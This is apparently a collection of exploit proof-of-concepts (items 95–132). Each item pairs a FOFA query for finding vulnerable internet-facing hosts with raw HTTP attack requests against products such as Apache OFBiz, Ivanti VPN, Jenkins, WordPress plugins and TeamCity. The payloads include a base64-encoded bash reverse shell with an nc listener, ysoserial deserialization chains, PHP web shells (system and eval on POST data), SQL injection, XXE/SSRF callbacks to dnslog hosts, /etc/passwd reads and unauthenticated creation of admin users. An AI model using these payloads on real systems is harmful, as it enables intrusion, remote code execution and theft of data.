95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
  <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 of the payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>

Generate the payload with ysoserial:
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"

Substitute the generated payload into the POC above:
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz 18.12.11 groovy remote code execution
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);

Reverse shell
Start a listener on Kali:
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"

98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B

99. Ncast (Yingkeshi) HD intelligent recording system busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D

100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--

101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body>             <ds:Signature           xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                   <ds:SignedInfo>                        <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/>                         <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>                    </ds:SignedInfo>                       <<ds:SignatureValue>qwerty</ds:SignatureValue>                    <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                         <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/>                   </ds:KeyInfo>                  <ds:Object></ds:Object>         </ds:Signature> </soap:Body></soap:Envelope>

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==

The SAMLRequest value is the base64 encoding of the following XML:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM "http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>

104. Totolink T8 settings endpoint cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Length: 41
Accept: application/json,text/javascript,*/*;q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding: gzip,deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{
"topicurl":"getSysStatusCfg",
"token":""
}

105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: <replace with your own token>
Connection: close

108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'

POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help [COMMAND]
Lists all the available commands or a detailed description of single command.
 COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)

110. GoAnywhere MFT unauthenticated administrator creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

111. WordPress Plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

112. WordPress Plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}

113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA: body="/wp-content/themes/bricks/"
Step 1: obtain the site's nonce value
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip

Step 2: substitute the nonce value and execute the command
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "<value obtained in step 1>",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}

116. WordPress js-support-ticket file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"

configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"

jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png

----------767099171--

117. WordPress LayerSlider plugin SQL injection
version: 7.9.11 – 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

118. Beijing Baichuo Smart S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--

Then access /home/src.php

119. Beijing Baichuo Smart S20 backend sysmanageajax.php SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
Log in to the system first; the default credentials are admin/admin.
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded;
Content-Length: 109
Origin: https://58.18.133.60:8443
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456

120. Beijing Baichuo Smart S40 management platform import web.php arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328

File path: /upload/2.php

121. 北京百绰智能 S42 management platform: arbitrary file upload via userattestation.php
CVE-2024-1918
FOFA: title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328

File path: boot/web/upload/weblogo/1.php

122. 北京百绰智能 S200 management platform: SQL injection in /importexport.php
CVE-2024-27718
FOFA: title="Smart管理平台"
The sql parameter (sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=) is the base64-encoded SQL statement; decoded it reads: sql=select 1,database(),version()
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

123. Atlassian Confluence template injection code execution
FOFA: app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

124. 湖南建研 engineering quality inspection system: arbitrary file upload
FOFA: body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

http://192.168.40.130:8282/Scripts/abcgcg.aspx

125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA: icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

After the user is created, log in to the backend directly; system commands can then be executed.

126. aiohttp path traversal
FOFA: title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

127. 广联达 Linkworks DataExchange.ashx XXE
FOFA: body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]
>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

128. Adobe ColdFusion deserialization
CVE-2023-38203
Affected: Adobe ColdFusion 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier)
FOFA: app="Adobe-ColdFusion"
PAYLOAD

129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA: app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Step 2: read the /etc/passwd file
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

130. Laykefu customer service system: arbitrary file upload
FOFA: icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

131. Mini-Tmall <= 20231017 SQL injection
FOFA: icon_hash="-2087517259"
Admin backend URL: http://localhost:8080/tmall/admin
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

132. JetBrains TeamCity 2023.11.3 and earlier: authentication bypass
CVE-2024-27198
FOFA: body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

CVE-2024-27199
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
